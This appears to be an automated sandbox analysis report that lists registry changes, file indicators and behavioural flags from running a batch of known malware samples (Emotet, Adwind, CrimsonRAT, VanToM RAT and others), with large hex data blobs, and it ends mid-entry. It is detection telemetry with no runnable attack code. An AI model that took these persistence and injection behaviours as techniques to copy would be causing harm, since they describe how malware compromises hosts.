5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell USB_Spreader.exe Set value (str) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" USB_Spreader.exe Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "14824" SearchHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13375" SearchHost.exe Set value (data) \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070800420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000023019c07f0e4da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2408-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2408-x64.exe -
NTFS ADS 15 IoCs
description ioc Process File created C:\THE_HEURISTIC_OF_NORTON_IS_VERY_BAD_AND_PRODUCE:POSITIVES-FALSES WScript.exe File opened for modification C:\Users\Admin\Downloads\DudleyTrojan.bat:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\VMware.Workstation.16.Pro.7z:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\VanToM-Rat.bat:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Carewmr.vbs:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Emotet.zip:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Adwind.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\Bolbi.vbs:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\7z2408-x64.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601:Zone.Identifier chrome.exe File created C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe\:Zone.Identifier:$DATA VanToM-Rat.bat File opened for modification C:\Users\Admin\Downloads\BlueScreen.exe:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\archive.zip:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\CobaltStrike.doc:Zone.Identifier chrome.exe File opened for modification C:\Users\Admin\Downloads\CrimsonRAT.exe:Zone.Identifier chrome.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 712 NOTEPAD.EXE 5436 NOTEPAD.EXE 5212 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2832 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 5480 WINWORD.EXE 5480 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 2440 chrome.exe 2440 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 4840 powershell.exe 4840 powershell.exe 4840 powershell.exe 1320 powershell.exe 1320 powershell.exe 1320 powershell.exe 2392 powershell.exe 2392 powershell.exe 2392 powershell.exe 2888 QuikNEZUpdater.exe 2888 QuikNEZUpdater.exe 5124 powershell.exe 5124 powershell.exe 5124 powershell.exe 2672 powershell.exe 2672 powershell.exe 2672 powershell.exe 5480 explorer.exe 5480 explorer.exe 5556 msedge.exe 5556 msedge.exe 4768 msedge.exe 4768 msedge.exe 1120 identity_helper.exe 1120 identity_helper.exe 6960 msedge.exe 6960 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
pid Process 6024 USB_Spreader.exe 5104 OpenWith.exe 2440 chrome.exe 896 setup.exe 5480 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs
pid Process 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe 4768 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe Token: SeShutdownPrivilege 2440 chrome.exe Token: SeCreatePagefilePrivilege 2440 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 2440 chrome.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 1488 7z2408-x64.exe 5492 Apex.exe 5608 AcroRd32.exe 5608 AcroRd32.exe 5608 AcroRd32.exe 5608 AcroRd32.exe 5608 AcroRd32.exe 6024 USB_Spreader.exe 6024 USB_Spreader.exe 6024 USB_Spreader.exe 5528 AcroRd32.exe 5528 AcroRd32.exe 5528 AcroRd32.exe 5528 AcroRd32.exe 5920 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5104 OpenWith.exe 5720 AcroRd32.exe 5720 AcroRd32.exe 5720 AcroRd32.exe 5720 AcroRd32.exe 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 5480 WINWORD.EXE 2440 chrome.exe 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 2620 WINWORD.EXE 6072 VanToM-Rat.bat -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2440 wrote to memory of 4688 2440 chrome.exe 78 PID 2440 wrote to memory of 4688 2440 chrome.exe 78 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 2440 wrote to memory of 3480 2440 chrome.exe 79 PID 